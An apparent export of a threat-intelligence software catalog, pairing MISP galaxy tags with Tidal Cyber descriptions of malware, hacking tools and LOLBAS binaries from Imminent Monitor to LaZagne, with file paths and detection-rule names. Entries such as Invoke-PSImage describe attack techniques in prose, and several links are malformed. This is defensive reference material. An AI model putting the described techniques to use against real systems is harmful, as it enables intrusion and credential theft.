The tag is: misp-galaxy:software="IMEWDBLD"

Imminent Monitor

[Imminent Monitor](https://app.tidalcyber.com/software/925fc0db-9315-4703-9353-1d0e9ecb1439) was a commodity remote access tool (RAT) offered for sale from 2012 until 2019, when an operation was conducted to take down the Imminent Monitor infrastructure. Various cracked versions and variations of this RAT are still in circulation.<sup>[[Imminent Unit42 Dec2019](https://app.tidalcyber.com/references/28f858c6-4c00-4c0c-bb27-9e000ba22690)]</sup>

The tag is: misp-galaxy:software="Imminent Monitor"

Impacket

[Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) is an open source collection of modules written in Python for programmatically constructing and manipulating network protocols. [Impacket](https://app.tidalcyber.com/software/cf2c5666-e8ad-49c1-ac8f-30ed65f9e52c) contains several tools for remote service execution, Kerberos manipulation, Windows credential dumping, packet sniffing, and relay attacks.<sup>[[Impacket Tools](https://app.tidalcyber.com/references/cdaf72ce-e8f7-42ae-b815-14a7fd47e292)]</sup>

The tag is: misp-galaxy:software="Impacket"

CRASHOVERRIDE - Associated Software

The tag is: misp-galaxy:software="CRASHOVERRIDE - Associated Software"

Win32/Industroyer - Associated Software

The tag is: misp-galaxy:software="Win32/Industroyer - Associated Software"

Industroyer

[Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.<sup>[[ESET Industroyer](https://app.tidalcyber.com/references/9197f712-3c53-4746-9722-30e248511611)]</sup> [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299) was used in the attacks on the Ukrainian power grid in December 2016.<sup>[[Dragos Crashoverride 2017](https://app.tidalcyber.com/references/c8f624e3-2ba2-4564-bd1c-f06b9a6a8bce)]</sup> This is the first publicly known malware specifically designed to target and impact operations in the electric grid.<sup>[[Dragos Crashoverride 2018](https://app.tidalcyber.com/references/d14442d5-2557-4a92-9a29-b15a20752f56)]</sup>

The tag is: misp-galaxy:software="Industroyer"

Industroyer2

[Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) is a compiled and static piece of malware that has the ability to communicate over the IEC-104 protocol. It is similar to the IEC-104 module found in [Industroyer](https://app.tidalcyber.com/software/09398a7c-aee5-44af-b99d-f73d3b39c299). Security researchers assess that [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) was designed to cause impact to high-voltage electrical substations. The initial [Industroyer2](https://app.tidalcyber.com/software/53c5fb76-a690-55c3-9e02-39577990da2a) sample was compiled on 03/23/2022 and scheduled to execute on 04/08/2022, however it was discovered before deploying, resulting in no impact.<sup>[[Industroyer2 Blackhat ESET](https://app.tidalcyber.com/references/d9e8ca96-8646-5dd9-bede-56305385b2e4)]</sup>

The tag is: misp-galaxy:software="Industroyer2"

Infdefaultinstall.exe - Associated Software

<sup>[[Infdefaultinstall.exe - LOLBAS Project](/references/5e83d17c-dbdd-4a6c-a395-4f921b68ebec)]</sup>

The tag is: misp-galaxy:software="Infdefaultinstall.exe - Associated Software"

Infdefaultinstall

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary used to perform installation based on content inside inf files

Author: Oddvar Moe

Paths: * C:\Windows\System32\Infdefaultinstall.exe * C:\Windows\SysWOW64\Infdefaultinstall.exe

The tag is: misp-galaxy:software="Infdefaultinstall"

InnaputRAT

[InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) is a remote access tool that can exfiltrate files from a victim’s machine. [InnaputRAT](https://app.tidalcyber.com/software/e42bf572-1e70-4467-a4b7-5e22c776c758) has been seen out in the wild since 2016. <sup>[[ASERT InnaputRAT April 2018](https://app.tidalcyber.com/references/29c6575f-9e47-48cb-8162-15280002a6d5)]</sup>

The tag is: misp-galaxy:software="InnaputRAT"

Installutil.exe - Associated Software

<sup>[[LOLBAS Installutil](/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:software="Installutil.exe - Associated Software"

Installutil

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe

Detection: * Sigma: [proc_creation_win_instalutil_no_log_execution.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml) * Sigma: [proc_creation_win_lolbin_installutil_download.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml) * Elastic: [defense_evasion_installutil_beacon.toml](https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml) * Elastic: [defense_evasion_network_connection_from_windows_binary.toml]([LOLBAS Installutil(/references/7dfb2c45-862a-4c25-a65a-55abea4b0e44)]</sup>

The tag is: misp-galaxy:software="Installutil"

Interact.sh - Associated Software

The tag is: misp-galaxy:software="Interact.sh - Associated Software"

Interactsh

According to joint Cybersecurity Advisory AA23-250A (September 2023), Interactsh is "an open-source tool for detecting external interactions (communication)". The Advisory further states that the tool is "used to detect callbacks from target systems for specified vulnerabilities and commonly used during the reconnaissance stages of adversary activity".<sup>[[U.S. CISA Zoho Exploits September 7 2023](/references/6bb581e8-ed0e-41fe-bf95-49b5d11b4e6b)]</sup>

The tag is: misp-galaxy:software="Interactsh"

InvisiMole

[InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) is a modular spyware program that has been used by the InvisiMole Group since at least 2013. [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) has two backdoor modules called RC2FM and RC2CL that are used to perform post-exploitation activities. It has been discovered on compromised victims in the Ukraine and Russia. [Gamaredon Group](https://app.tidalcyber.com/groups/41e8b4a4-2d31-46ee-bc56-12375084d067) infrastructure has been used to download and execute [InvisiMole](https://app.tidalcyber.com/software/3ee4c49d-2f2c-4677-b193-69f16f2851a4) against a small number of victims.<sup>[[ESET InvisiMole June 2018](https://app.tidalcyber.com/references/629fa1d8-06cb-405c-a2f7-c511b54cd727)]</sup><sup>[[ESET InvisiMole June 2020](https://app.tidalcyber.com/references/d10cfda8-8fd8-4ada-8c61-dba6065b0bac)]</sup>

The tag is: misp-galaxy:software="InvisiMole"

Invoke-PSImage

[Invoke-PSImage](https://app.tidalcyber.com/software/2200a647-3312-44c0-9691-4a26153febbb) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. <sup>[[GitHub Invoke-PSImage](https://app.tidalcyber.com/references/dd210b79-bd5f-4282-9542-4d1ae2f16438)]</sup>

The tag is: misp-galaxy:software="Invoke-PSImage"

IOBit

IOBit is a self-described "freeware" tool that can ostensibly be used to "clean, optimize, speed up and secure" personal computers. According to U.S. cybersecurity authorities, IOBit has been used by adversaries, such as ransomware actors, as part of their operations, for example to disable anti-virus software.<sup>[[U.S. CISA Play Ransomware December 2023](/references/ad96148c-8230-4923-86fd-4b1da211db1a)]</sup>

The tag is: misp-galaxy:software="IOBit"

ipconfig

[ipconfig](https://app.tidalcyber.com/software/4f519002-0576-4f8e-8add-73ebac9a86e6) is a Windows utility that can be used to find information about a system’s TCP/IP, DNS, DHCP, and adapter configuration. <sup>[[TechNet Ipconfig](https://app.tidalcyber.com/references/8a6e6f59-70fb-48bf-96d2-318dd92df995)]</sup>

The tag is: misp-galaxy:software="ipconfig"

IronNetInjector

[IronNetInjector](https://app.tidalcyber.com/software/9ca96281-8ff9-4619-a79d-16c5a9594eae) is a [Turla](https://app.tidalcyber.com/groups/47ae4fb1-fc61-4e8e-9310-66dda706e1a2) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT]([Unit 42 IronNetInjector February 2021 (https://app.tidalcyber.com/references/f04c89f7-d951-4ebc-a5e4-2cc69476c43f)]</sup>

The tag is: misp-galaxy:software="IronNetInjector"

ISMInjector

The tag is: misp-galaxy:software="ISMInjector"

Ixeshe

[Ixeshe](https://app.tidalcyber.com/software/6dbf31cf-0ba0-48b4-be82-38889450845c) is a malware family that has been used since at least 2009 against targets in East Asia. <sup>[[Moran 2013](https://app.tidalcyber.com/references/d38bdb47-1a8d-43f8-b7ed-dfa5e430ac2f)]</sup>

The tag is: misp-galaxy:software="Ixeshe"

Jaguar Tooth

Jaguar Tooth is a malicious software bundle consisting of a series of payloads and patches. Russia-backed APT28 used Jaguar Tooth during a series of compromises involving vulnerable Cisco routers belonging to U.S., Ukrainian, and other entities in 2021.<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

According to an April 2023 UK National Cyber Security Centre technical report on Jaguar Tooth, the malware is deployed and executed via exploitation of CVE-2017-6742, a Simple Network Management Protocol (SNMP) vulnerability for which Cisco released a patch in 2017. Jaguar Tooth deployments allowed actors to collect further device information via execution of Cisco IOS Command Line Interface commands, discover other network devices, and achieve unauthenticated backdoor access to victim systems.<sup>[[UK NCSC Jaguar Tooth April 18 2023](/references/954e0cb9-9a93-4cac-af84-c6989b973fac)]</sup>

Related Vulnerabilities: CVE-2017-6742<sup>[[U.S. CISA APT28 Cisco Routers April 18 2023](/references/c532a6fc-b27f-4240-a071-3eaa866bce89)]</sup>

The tag is: misp-galaxy:software="Jaguar Tooth"

Janicab

[Janicab](https://app.tidalcyber.com/software/a4debf1f-8a37-4c89-8ebc-31de71d33f79) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. <sup>[[Janicab](https://app.tidalcyber.com/references/1acc1a83-faac-41d3-a08b-cc3a539567fb)]</sup>

The tag is: misp-galaxy:software="Janicab"

Javali

[Javali](https://app.tidalcyber.com/software/853d3d18-d746-4650-a9bd-c36a0e86dd02) is a banking trojan that has targeted Portuguese and Spanish-speaking countries since 2017, primarily focusing on customers of financial institutions in Brazil and Mexico.<sup>[[Securelist Brazilian Banking Malware July 2020](https://app.tidalcyber.com/references/ccc34875-93f3-40ed-a9ee-f31b86708507)]</sup>

The tag is: misp-galaxy:software="Javali"

JCry

[JCry](https://app.tidalcyber.com/software/41ec0bbc-65ca-4913-a763-1638215d7b2f) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.<sup>[[Carbon Black JCry May 2019](https://app.tidalcyber.com/references/deb97163-323a-493a-9c73-b41c8c5e5cd1)]</sup>

The tag is: misp-galaxy:software="JCry"

Trojan.Sofacy - Associated Software

This designation has been used in reporting both to refer to the threat group ([Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)) and its associated malware.<sup>[[Symantec APT28 Oct 2018](https://app.tidalcyber.com/references/777bc94a-6c21-4f8c-9efa-a1cf52ececc0)]</sup>

The tag is: misp-galaxy:software="Trojan.Sofacy - Associated Software"

Sednit - Associated Software

This designation has been used in reporting both to refer to the threat group ([APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5)) and its associated malware.<sup>[[FireEye APT28 January 2017](https://app.tidalcyber.com/references/61d80b8f-5bdb-41e6-b59a-d2d996392873)]</sup>

The tag is: misp-galaxy:software="Sednit - Associated Software"

Seduploader - Associated Software

The tag is: misp-galaxy:software="Seduploader - Associated Software"

JKEYSKW - Associated Software

The tag is: misp-galaxy:software="JKEYSKW - Associated Software"

GAMEFISH - Associated Software

The tag is: misp-galaxy:software="GAMEFISH - Associated Software"

SofacyCarberp - Associated Software

The tag is: misp-galaxy:software="SofacyCarberp - Associated Software"

JHUHUGIT

The tag is: misp-galaxy:software="JHUHUGIT"

JPIN

The tag is: misp-galaxy:software="JPIN"

JSocket - Associated Software

The tag is: misp-galaxy:software="JSocket - Associated Software"

Unrecom - Associated Software

The tag is: misp-galaxy:software="Unrecom - Associated Software"

jFrutas - Associated Software

The tag is: misp-galaxy:software="jFrutas - Associated Software"

Adwind - Associated Software

The tag is: misp-galaxy:software="Adwind - Associated Software"

jBiFrost - Associated Software

The tag is: misp-galaxy:software="jBiFrost - Associated Software"

Trojan.Maljava - Associated Software

The tag is: misp-galaxy:software="Trojan.Maljava - Associated Software"

AlienSpy - Associated Software

The tag is: misp-galaxy:software="AlienSpy - Associated Software"

Frutas - Associated Software

The tag is: misp-galaxy:software="Frutas - Associated Software"

Sockrat - Associated Software

The tag is: misp-galaxy:software="Sockrat - Associated Software"

jRAT

[jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://app.tidalcyber.com/software/42fe9795-5cf6-4ad7-b56e-2aa655377992) have been distributed via a software-as-a-service platform, similar to an online subscription model.<sup>[[Kaspersky Adwind Feb 2016](https://app.tidalcyber.com/references/69fd8de4-81bc-4165-b77d-c5fc72cfa699)]</sup> <sup>[[jRAT Symantec Aug 2018](https://app.tidalcyber.com/references/8aed9534-2ec6-4c9f-b63b-9bb135432cfb)]</sup>

The tag is: misp-galaxy:software="jRAT"

Jsc.exe - Associated Software

<sup>[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]</sup>

The tag is: misp-galaxy:software="Jsc.exe - Associated Software"

Jsc

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format

Author: Oddvar Moe

Paths: * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe

Detection: * Sigma: [proc_creation_win_lolbin_jsc.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml) * IOC: Jsc.exe should normally not run a system unless it is used for development.<sup>[[Jsc.exe - LOLBAS Project](/references/ae25ff74-05eb-46d7-9c60-4c149b7c7f1f)]</sup>

The tag is: misp-galaxy:software="Jsc"

JSS Loader

[JSS Loader](https://app.tidalcyber.com/software/c67f3029-a26c-4752-b7f1-8e3369c2f79d) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://app.tidalcyber.com/groups/4348c510-50fc-4448-ab8d-c8cededd19ff) since at least 2020.<sup>[[eSentire FIN7 July 2021](https://app.tidalcyber.com/references/3976dd0e-7dee-4ae7-8c38-484b12ca233e)]</sup><sup>[[CrowdStrike Carbon Spider August 2021](https://app.tidalcyber.com/references/36f0ddb0-94af-494c-ad10-9d3f75d1d810)]</sup>

The tag is: misp-galaxy:software="JSS Loader"

KARAE

The tag is: misp-galaxy:software="KARAE"

Kasidet

[Kasidet](https://app.tidalcyber.com/software/1896b9c9-a93e-4220-b4c2-6c4c9c5ca297) is a backdoor that has been dropped by using malicious VBA macros. <sup>[[Zscaler Kasidet](https://app.tidalcyber.com/references/63077223-4711-4c1e-9fb2-3995c7e03cf2)]</sup>

The tag is: misp-galaxy:software="Kasidet"

Kazuar

[Kazuar](https://app.tidalcyber.com/software/e93990a0-4841-4867-8b74-ac2806d787bf) is a fully featured, multi-platform backdoor Trojan written using the Microsoft .NET framework. <sup>[[Unit 42 Kazuar May 2017](https://app.tidalcyber.com/references/07e64ee6-3d3e-49e4-bb06-ff5897e26ea9)]</sup>

The tag is: misp-galaxy:software="Kazuar"

Kerrdown

[Kerrdown](https://app.tidalcyber.com/software/17c28e46-1005-4737-8567-d4ad9f1aefd1) is a custom downloader that has been used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) since at least 2018 to install spyware from a server on the victim’s network.<sup>[[Amnesty Intl. Ocean Lotus February 2021](https://app.tidalcyber.com/references/a54a2f68-8406-43ab-8758-07edd49dfb83)]</sup><sup>[[Unit 42 KerrDown February 2019](https://app.tidalcyber.com/references/bff5dbfe-d080-46c1-82b7-272e03d2aa8c)]</sup>

The tag is: misp-galaxy:software="Kerrdown"

Kessel

[Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) is an advanced version of OpenSSH which acts as a custom backdoor, mainly acting to steal credentials and function as a bot. [Kessel](https://app.tidalcyber.com/software/32f1e0d3-753f-4b51-aec5-cfaa393cedc3) has been active since its C2 domain began resolving in August 2018.<sup>[[ESET ForSSHe December 2018](https://app.tidalcyber.com/references/0e25bf8b-3c9e-4661-a9fd-79b2ad3b8dd2)]</sup>

The tag is: misp-galaxy:software="Kessel"

Kevin

[Kevin](https://app.tidalcyber.com/software/b9730d7c-aa57-4d6f-9125-57dcb65b02e0) is a backdoor implant written in C++ that has been used by [HEXANE](https://app.tidalcyber.com/groups/eecf7289-294f-48dd-a747-7705820f4735) since at least June 2020, including in operations against organizations in Tunisia.<sup>[[Kaspersky Lyceum October 2021](https://app.tidalcyber.com/references/b3d13a82-c24e-4b47-b47a-7221ad449859)]</sup>

The tag is: misp-galaxy:software="Kevin"

KeyBoy

[KeyBoy](https://app.tidalcyber.com/software/6ec39371-d50b-43b6-937c-52de00491eab) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.<sup>[[CitizenLab KeyBoy Nov 2016](https://app.tidalcyber.com/references/a9394372-3981-4f41-ad66-9db343e773b1)]</sup><sup>[[PWC KeyBoys Feb 2017](https://app.tidalcyber.com/references/9ac6737b-c8a2-416f-bbc3-8c5556ad4833)]</sup>

The tag is: misp-galaxy:software="KeyBoy"

OSX/Keydnap - Associated Software

The tag is: misp-galaxy:software="OSX/Keydnap - Associated Software"

Keydnap

This piece of malware steals the content of the user’s keychain while maintaining a permanent backdoor <sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup>.

The tag is: misp-galaxy:software="Keydnap"

KEYMARBLE

[KEYMARBLE](https://app.tidalcyber.com/software/a644f61e-6a9b-41ab-beca-72518351c27f) is a Trojan that has reportedly been used by the North Korean government. <sup>[[US-CERT KEYMARBLE Aug 2018](https://app.tidalcyber.com/references/b30dd720-a85d-4bf5-84e1-394a27917ee7)]</sup>

The tag is: misp-galaxy:software="KEYMARBLE"

KEYPLUG.LINUX - Associated Software

The tag is: misp-galaxy:software="KEYPLUG.LINUX - Associated Software"

KEYPLUG

[KEYPLUG](https://app.tidalcyber.com/software/ba9e56b9-7904-5ec8-bb39-7f82f7b2e89a) is a modular backdoor written in C++, with Windows and Linux variants, that has been used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9) since at least June 2021.<sup>[[Mandiant APT41](https://app.tidalcyber.com/references/e54415fe-40c2-55ff-9e75-881bc8a912b8)]</sup>

The tag is: misp-galaxy:software="KEYPLUG"

KGH_SPY

[KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) is a modular suite of tools used by [Kimsuky](https://app.tidalcyber.com/groups/37f317d8-02f0-43d4-8a7d-7a65ce8aadf1) for reconnaissance, information stealing, and backdoor capabilities. [KGH_SPY](https://app.tidalcyber.com/software/c1e1ab6a-d5ce-4520-98c5-c6df41005fd9) derived its name from PDB paths and internal names found in samples containing "KGH".<sup>[[Cybereason Kimsuky November 2020](https://app.tidalcyber.com/references/ecc2f5ad-b2a8-470b-b919-cb184d12d00f)]</sup>

The tag is: misp-galaxy:software="KGH_SPY"

Win32/KillDisk.NBI - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBI - Associated Software"

Win32/KillDisk.NBH - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBH - Associated Software"

Win32/KillDisk.NBD - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBD - Associated Software"

Win32/KillDisk.NBC - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBC - Associated Software"

Win32/KillDisk.NBB - Associated Software

The tag is: misp-galaxy:software="Win32/KillDisk.NBB - Associated Software"

KillDisk

[KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://app.tidalcyber.com/software/908216c7-3ad4-4e0c-9dd3-a7ed5d1c695f) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://app.tidalcyber.com/software/b5532e91-d267-4819-a05d-8c5358995add) variants.<sup>[[KillDisk Ransomware](https://app.tidalcyber.com/references/9d22f13d-af6d-47b5-93ed-5e4b85b94978)]</sup><sup>[[ESEST Black Energy Jan 2016](https://app.tidalcyber.com/references/4d626eb9-3722-4aa4-b95e-1650cc2865c2)]</sup><sup>[[Trend Micro KillDisk 1](https://app.tidalcyber.com/references/8ae31db0-2744-4366-9747-55fc4679dbf5)]</sup><sup>[[Trend Micro KillDisk 2](https://app.tidalcyber.com/references/62d9a4c9-e669-4dd4-a584-4f3e3e54f97f)]</sup>

The tag is: misp-galaxy:software="KillDisk"

Kinsing

[Kinsing](https://app.tidalcyber.com/software/7b4f157c-4b34-4f55-9c20-ff787495e9ba) is Golang-based malware that runs a cryptocurrency miner and attempts to spread itself to other hosts in the victim environment. <sup>[[Aqua Kinsing April 2020](https://app.tidalcyber.com/references/67dd04dd-c0e0-49e6-9341-4e445d660641)]</sup><sup>[[Sysdig Kinsing November 2020](https://app.tidalcyber.com/references/4922dbb5-d3fd-4bf2-8af7-3b8889579c31)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup>

The tag is: misp-galaxy:software="Kinsing"

Kivars

[Kivars](https://app.tidalcyber.com/software/673ed346-9562-4997-80b2-e701b1a99a58) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://app.tidalcyber.com/groups/528ab2ea-b8f1-44d8-8831-2a89fefd97cb) in a 2010 campaign.<sup>[[TrendMicro BlackTech June 2017](https://app.tidalcyber.com/references/abb9cb19-d30e-4048-b106-eb29a6dad7fc)]</sup>

The tag is: misp-galaxy:software="Kivars"

Koadic

[Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub. [Koadic](https://app.tidalcyber.com/software/5e981594-d00a-4c7f-8ed0-3d4a60cc3fcd) has several options for staging payloads and creating implants, and performs most of its operations using Windows Script Host.<sup>[[Github Koadic](https://app.tidalcyber.com/references/54cbf1bd-9aed-4f82-8c15-6e88dd5d8d64)]</sup><sup>[[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)]</sup><sup>[[MalwareBytes LazyScripter Feb 2021](https://app.tidalcyber.com/references/078837a7-82cd-4e26-9135-43b612e911fe)]</sup>

The tag is: misp-galaxy:software="Koadic"

Kobalos

[Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) is a multi-platform backdoor that can be used against Linux, FreeBSD, and Solaris. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) has been deployed against high profile targets, including high-performance computers, academic servers, an endpoint security vendor, and a large internet service provider; it has been found in Europe, North America, and Asia. [Kobalos](https://app.tidalcyber.com/software/bf918663-90bd-489e-91e7-6951a18a25fd) was first identified in late 2019.<sup>[[ESET Kobalos Feb 2021](https://app.tidalcyber.com/references/883a9417-f7f6-4aa6-8708-8c320d4e0a7a)]</sup><sup>[[ESET Kobalos Jan 2021](https://app.tidalcyber.com/references/745e963e-33fd-40d4-a8c6-1a9f321017f4)]</sup>

The tag is: misp-galaxy:software="Kobalos"

Komplex

The tag is: misp-galaxy:software="Komplex"

KOMPROGO

[KOMPROGO](https://app.tidalcyber.com/software/3067f148-2e2b-4aac-9652-59823b3ad4f1) is a signature backdoor used by [APT32](https://app.tidalcyber.com/groups/c0fe9859-e8de-4ce1-bc3c-b489e914a145) that is capable of process, file, and registry management. <sup>[[FireEye APT32 May 2017](https://app.tidalcyber.com/references/b72d017b-a70f-4003-b3d9-90d79aca812d)]</sup>

The tag is: misp-galaxy:software="KOMPROGO"

KONNI

[KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) is a remote access tool that security researchers assess has been used by North Korean cyber actors since at least 2014. [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) has significant code overlap with the [NOKKI](https://app.tidalcyber.com/software/31aa0433-fb6b-4290-8af5-a0d0c6c18548) malware family, and has been linked to several suspected North Korean campaigns targeting political organizations in Russia, East Asia, Europe and the Middle East; there is some evidence potentially linking [KONNI](https://app.tidalcyber.com/software/d381de2a-30cb-4d50-bbce-fd1e489c4889) to [APT37]([Talos Konni May 2017(https://app.tidalcyber.com/references/4cb69c58-4e47-4fb9-9eef-8a0b5447a553)]</sup><sup>[[Unit 42 NOKKI Sept 2018](https://app.tidalcyber.com/references/f3d3b9bc-4c59-4a1f-b602-e3e884661708)]</sup><sup>[[Unit 42 Nokki Oct 2018](https://app.tidalcyber.com/references/4eea6638-a71b-4d74-acc4-0fac82ef72f6)]</sup><sup>[[Medium KONNI Jan 2020](https://app.tidalcyber.com/references/e117a6ac-eaa2-4494-b4ae-2d9ae52c3251)]</sup><sup>[[Malwarebytes Konni Aug 2021](https://app.tidalcyber.com/references/fb8c6402-ec18-414a-85f7-3d76eacbd890)]</sup>

The tag is: misp-galaxy:software="KONNI"

KOPILUWAK

[KOPILUWAK](https://app.tidalcyber.com/software/d09c4459-1aa3-547d-99f4-7ac73b8043f0) is a JavaScript-based reconnaissance tool that has been used for victim profiling and C2 since at least 2017.<sup>[[Mandiant Suspected Turla Campaign February 2023](https://app.tidalcyber.com/references/d8f43a52-a59e-5567-8259-821b1b6bde43)]</sup>

The tag is: misp-galaxy:software="KOPILUWAK"

Kwampirs

[Kwampirs](https://app.tidalcyber.com/software/35ac4018-8506-4025-a9e3-bd017700b3b3) is a backdoor Trojan used by [Orangeworm](https://app.tidalcyber.com/groups/863b7013-133d-4a82-93d2-51b53a8fd30e). It has been found on machines which had software installed for the use and control of high-tech imaging devices such as X-Ray and MRI machines. <sup>[[Symantec Orangeworm April 2018](https://app.tidalcyber.com/references/eee5efa1-bbc6-44eb-8fae-23002f351605)]</sup>

The tag is: misp-galaxy:software="Kwampirs"

Launch-VsDevShell.ps1 - Associated Software

<sup>[[Launch-VsDevShell.ps1 - LOLBAS Project](/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]</sup>

The tag is: misp-galaxy:software="Launch-VsDevShell.ps1 - Associated Software"

Launch-VsDevShell

This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).

Description: Locates and imports a Developer PowerShell module and calls the Enter-VsDevShell cmdlet

Author: Nasreddine Bencherchali

Paths: * C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\Tools\Launch-VsDevShell.ps1 * C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\Tools\Launch-VsDevShell.ps1

Detection: * Sigma: [proc_creation_win_lolbin_launch_vsdevshell.yml]([Launch-VsDevShell.ps1 - LOLBAS Project(/references/6e81ff6a-a386-495e-bd4b-cf698b02bce8)]</sup>

The tag is: misp-galaxy:software="Launch-VsDevShell"

LaZagne

[LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://app.tidalcyber.com/software/f5558af4-e3e2-47c2-b8fe-72850bd30f37) is publicly available on GitHub.<sup>[[GitHub LaZagne Dec 2018](https://app.tidalcyber.com/references/9347b507-3a41-405d-87f9-d4fc2bfc48e5)]</sup>

The tag is: misp-galaxy:software="LaZagne"

Ldifde.exe - Associated Software

